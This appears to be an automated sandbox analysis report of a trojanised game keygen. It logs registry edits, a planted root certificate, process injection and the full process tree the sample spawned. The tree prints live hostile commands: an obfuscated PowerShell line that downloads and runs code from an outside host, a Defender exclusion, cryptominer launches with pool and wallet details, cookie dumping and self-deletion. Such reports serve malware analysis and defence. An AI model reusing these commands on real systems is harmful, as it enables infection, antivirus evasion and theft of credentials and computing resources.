Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	2.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	2.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601	2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	2.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4356	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
8868	PING.EXE
6504	PING.EXE
2780	PING.EXE
4704	PING.EXE
5316	PING.EXE

Script User-Agent 8 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	308	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	322	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	577	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	582	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	685	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	701	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	138	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	144	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2492	setups.tmp
2492	setups.tmp

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeDebugPrivilege	1720	Setup.exe
Token: SeCreateTokenPrivilege	184	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	184	askinstall20.exe
Token: SeLockMemoryPrivilege	184	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	184	askinstall20.exe
Token: SeMachineAccountPrivilege	184	askinstall20.exe
Token: SeTcbPrivilege	184	askinstall20.exe
Token: SeSecurityPrivilege	184	askinstall20.exe
Token: SeTakeOwnershipPrivilege	184	askinstall20.exe
Token: SeLoadDriverPrivilege	184	askinstall20.exe
Token: SeSystemProfilePrivilege	184	askinstall20.exe
Token: SeSystemtimePrivilege	184	askinstall20.exe
Token: SeProfSingleProcessPrivilege	184	askinstall20.exe
Token: SeIncBasePriorityPrivilege	184	askinstall20.exe
Token: SeCreatePagefilePrivilege	184	askinstall20.exe
Token: SeCreatePermanentPrivilege	184	askinstall20.exe
Token: SeBackupPrivilege	184	askinstall20.exe
Token: SeRestorePrivilege	184	askinstall20.exe
Token: SeShutdownPrivilege	184	askinstall20.exe
Token: SeDebugPrivilege	184	askinstall20.exe
Token: SeAuditPrivilege	184	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	184	askinstall20.exe
Token: SeChangeNotifyPrivilege	184	askinstall20.exe
Token: SeRemoteShutdownPrivilege	184	askinstall20.exe
Token: SeUndockPrivilege	184	askinstall20.exe
Token: SeSyncAgentPrivilege	184	askinstall20.exe
Token: SeEnableDelegationPrivilege	184	askinstall20.exe
Token: SeManageVolumePrivilege	184	askinstall20.exe
Token: SeImpersonatePrivilege	184	askinstall20.exe
Token: SeCreateGlobalPrivilege	184	askinstall20.exe
Token: 31	184	askinstall20.exe
Token: 32	184	askinstall20.exe
Token: 33	184	askinstall20.exe
Token: 34	184	askinstall20.exe
Token: 35	184	askinstall20.exe
Token: SeDebugPrivilege	2924	multitimer.exe
Token: SeDebugPrivilege	2096	taskkill.exe
Token: SeDebugPrivilege	4104	2.exe
Token: SeDebugPrivilege	4104	2.exe
Token: SeDebugPrivilege	4104	2.exe
Token: SeDebugPrivilege	4104	2.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3004	setups.exe
2492	setups.tmp
4104	2.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 1908 wrote to memory of 64	1908	Test_Drive_Unlimited_2_keygen.exe	79
PID 1908 wrote to memory of 64	1908	Test_Drive_Unlimited_2_keygen.exe	79
PID 1908 wrote to memory of 64	1908	Test_Drive_Unlimited_2_keygen.exe	79
PID 64 wrote to memory of 3100	64	cmd.exe	82
PID 64 wrote to memory of 3100	64	cmd.exe	82
PID 64 wrote to memory of 3100	64	cmd.exe	82
PID 64 wrote to memory of 3368	64	cmd.exe	83
PID 64 wrote to memory of 3368	64	cmd.exe	83
PID 64 wrote to memory of 3368	64	cmd.exe	83
PID 64 wrote to memory of 3484	64	cmd.exe	84
PID 64 wrote to memory of 3484	64	cmd.exe	84
PID 64 wrote to memory of 3484	64	cmd.exe	84
PID 64 wrote to memory of 3028	64	cmd.exe	85
PID 64 wrote to memory of 3028	64	cmd.exe	85
PID 64 wrote to memory of 3028	64	cmd.exe	85
PID 3100 wrote to memory of 3240	3100	keygen-pr.exe	86
PID 3100 wrote to memory of 3240	3100	keygen-pr.exe	86
PID 3100 wrote to memory of 3240	3100	keygen-pr.exe	86
PID 3028 wrote to memory of 1720	3028	keygen-step-4.exe	87
PID 3028 wrote to memory of 1720	3028	keygen-step-4.exe	87
PID 3240 wrote to memory of 1452	3240	key.exe	88
PID 3240 wrote to memory of 1452	3240	key.exe	88
PID 3240 wrote to memory of 1452	3240	key.exe	88
PID 3484 wrote to memory of 3936	3484	keygen-step-3.exe	89
PID 3484 wrote to memory of 3936	3484	keygen-step-3.exe	89
PID 3484 wrote to memory of 3936	3484	keygen-step-3.exe	89
PID 3936 wrote to memory of 2780	3936	cmd.exe	91
PID 3936 wrote to memory of 2780	3936	cmd.exe	91
PID 3936 wrote to memory of 2780	3936	cmd.exe	91
PID 1720 wrote to memory of 2924	1720	Setup.exe	92
PID 1720 wrote to memory of 2924	1720	Setup.exe	92
PID 1720 wrote to memory of 3004	1720	Setup.exe	93
PID 1720 wrote to memory of 3004	1720	Setup.exe	93
PID 1720 wrote to memory of 3004	1720	Setup.exe	93
PID 3028 wrote to memory of 184	3028	keygen-step-4.exe	94
PID 3028 wrote to memory of 184	3028	keygen-step-4.exe	94
PID 3028 wrote to memory of 184	3028	keygen-step-4.exe	94
PID 3004 wrote to memory of 2492	3004	setups.exe	95
PID 3004 wrote to memory of 2492	3004	setups.exe	95
PID 3004 wrote to memory of 2492	3004	setups.exe	95
PID 184 wrote to memory of 3984	184	askinstall20.exe	97
PID 184 wrote to memory of 3984	184	askinstall20.exe	97
PID 184 wrote to memory of 3984	184	askinstall20.exe	97
PID 3984 wrote to memory of 2096	3984	cmd.exe	99
PID 3984 wrote to memory of 2096	3984	cmd.exe	99
PID 3984 wrote to memory of 2096	3984	cmd.exe	99

C:\Users\Admin\AppData\Local\Temp\Test_Drive_Unlimited_2_keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Test_Drive_Unlimited_2_keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:64
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3100
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3240
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:1452
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:3368
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3484
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3936
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2780
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3028
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1720
    - - C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2924
      - C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe" 1 3.1617513199.60694aeff1ed9 101
        6⤵
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1UGAUJ1K6S\multitimer.exe" 2 3.1617513199.60694aeff1ed9
        7⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\ymyiukjvt5x\iruagfogfzw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ymyiukjvt5x\iruagfogfzw.exe" /VERYSILENT
        8⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\is-T07AM.tmp\iruagfogfzw.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-T07AM.tmp\iruagfogfzw.tmp" /SL5="$1031A,2592217,780800,C:\Users\Admin\AppData\Local\Temp\ymyiukjvt5x\iruagfogfzw.exe" /VERYSILENT
        9⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\is-5JC09.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5JC09.tmp\winlthsth.exe"
        10⤵
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\FLSID43zE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FLSID43zE.exe"
        11⤵
        
        PID:856
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        12⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
        12⤵
        
        PID:7900
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        13⤵
        
        PID:6960
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:6512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\ih4yjijv5ki\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ih4yjijv5ki\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:5128
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        10⤵
        
        PID:5840
        
        C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c4ceda77-4441-4d93-be20-d8c498d73fcb\AdvancedRun.exe" /SpecialRun 4101d8 5840
        11⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        10⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        10⤵
        
        PID:3132
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        11⤵
        Delays execution with timeout.exe
        
        PID:1268
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        10⤵
        
        PID:2164
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 1920
        10⤵
        Program crash
        
        PID:4136
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:6196
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\qe2ndlgdtke\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qe2ndlgdtke\vpn.exe" /silent /subid=482
        8⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\is-3B6IP.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3B6IP.tmp\vpn.tmp" /SL5="$2035E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\qe2ndlgdtke\vpn.exe" /silent /subid=482
        9⤵
        
        PID:5616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5712
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:1344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:6348
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:6236
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:1608
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:5776
        
        C:\Users\Admin\AppData\Local\Temp\aoencrf4wim\xeetzqvbsqa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\aoencrf4wim\xeetzqvbsqa.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:5584
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\aoencrf4wim\xeetzqvbsqa.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\aoencrf4wim\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617254117 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\vtyth3ixulc\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vtyth3ixulc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Local\Temp\medrwbfgszl\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\medrwbfgszl\app.exe" /8-23
        8⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\4iy555r3g1t\vknwj0sgc0c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4iy555r3g1t\vknwj0sgc0c.exe"
        8⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4iy555r3g1t\vknwj0sgc0c.exe"
        9⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        10⤵
        Runs ping.exe
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\3kay0ub0wuw\rd0pvc40ctk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3kay0ub0wuw\rd0pvc40ctk.exe" /ustwo INSTALL
        8⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "rd0pvc40ctk.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3kay0ub0wuw\rd0pvc40ctk.exe" & exit
        9⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "rd0pvc40ctk.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:3740
        
        C:\Users\Admin\AppData\Local\Temp\qg2mwtvnvf2\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qg2mwtvnvf2\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:4916
    - - C:\Users\Admin\AppData\Local\Temp\KA26XXEWX5\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KA26XXEWX5\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3004
      - C:\Users\Admin\AppData\Local\Temp\is-F1OO3.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F1OO3.tmp\setups.tmp" /SL5="$4011A,635399,250368,C:\Users\Admin\AppData\Local\Temp\KA26XXEWX5\setups.exe" ll
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2492
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:184
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3984
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2096
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"
      4⤵
      PID:4644
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        5⤵
        
        PID:4764
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        6⤵
        
        PID:4908
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
      4⤵
      PID:4800
    - - C:\Users\Admin\AppData\Roaming\9E1A.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\9E1A.tmp.exe"
        5⤵
        
        PID:1404
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:4556
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:5296
    - - C:\Users\Admin\AppData\Roaming\A04E.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A04E.tmp.exe"
        5⤵
        
        PID:648
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\A04E.tmp.exe
        6⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:212
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        5⤵
        
        PID:632
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:4704
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      PID:1264
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      PID:4832
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      PID:5384
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:10248
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:11164

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4104

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4156

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4376

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5044

C:\Users\Admin\AppData\Local\Temp\is-FH22R.tmp\IBInstaller_97039.tmp
